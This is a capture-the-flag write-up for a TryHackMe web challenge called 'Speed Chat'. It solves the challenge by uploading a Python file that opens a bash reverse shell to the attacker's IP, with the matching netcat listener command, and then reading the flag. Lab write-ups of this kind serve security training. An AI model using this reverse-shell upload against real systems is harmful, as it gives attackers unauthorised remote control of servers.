Speed Chat
🌐 Love at First Breach 2026 - Speed Chat
| Category | Author |
|---|---|
| 🌐 Web | TryHackMe |
Challenge Prompt
My Dearest Hacker,
Days before Valentine’s Day, TryHeartMe rushed out a new messaging platform called “Speed Chatter”, promising instant connections and private conversations. But in the race to beat the holiday deadline, security took a back seat. Rumours are circulating that “Speed Chatter” was pushed to production without proper testing.
As a security researcher, it’s your task to break into “Speed Chatter”, uncover flaws, and expose TryHeartMe’s negligence before the damage becomes irreversible.
You can find the web application here: http://MACHINE_IP:5000
Problem Type
- Web
Solve
When we visit the website, we get a chat window and profile window. I started off with sending a chat to see if there would be a response, but there wasn’t.
It appears we can upload a file. Let’s run a quick nmap scan to see what language the site is running. I used nmap -p 5000 -T4 -A <SITE IP HERE>:
Looks like this is running in Python, so let’s try a Python reverse shell. We will do a really simple one that calls a bash reverse shell from Payloads All The Things:
1
2
import os
os.system("bash -c 'bash -i >& /dev/tcp/<YOUR VPN IP>/7777 0>&1'")
Save this file as exploit.py.
Then you can start a netcat listener on your machine using nc -nvlp 7777 in the terminal.
On the website, click Choose File and pick your exploit.py file. Then click Upload. When you return to your termial you should have access.
Then you can run
ls -la
There you will see the flag.txt file which you can cat out to the screen: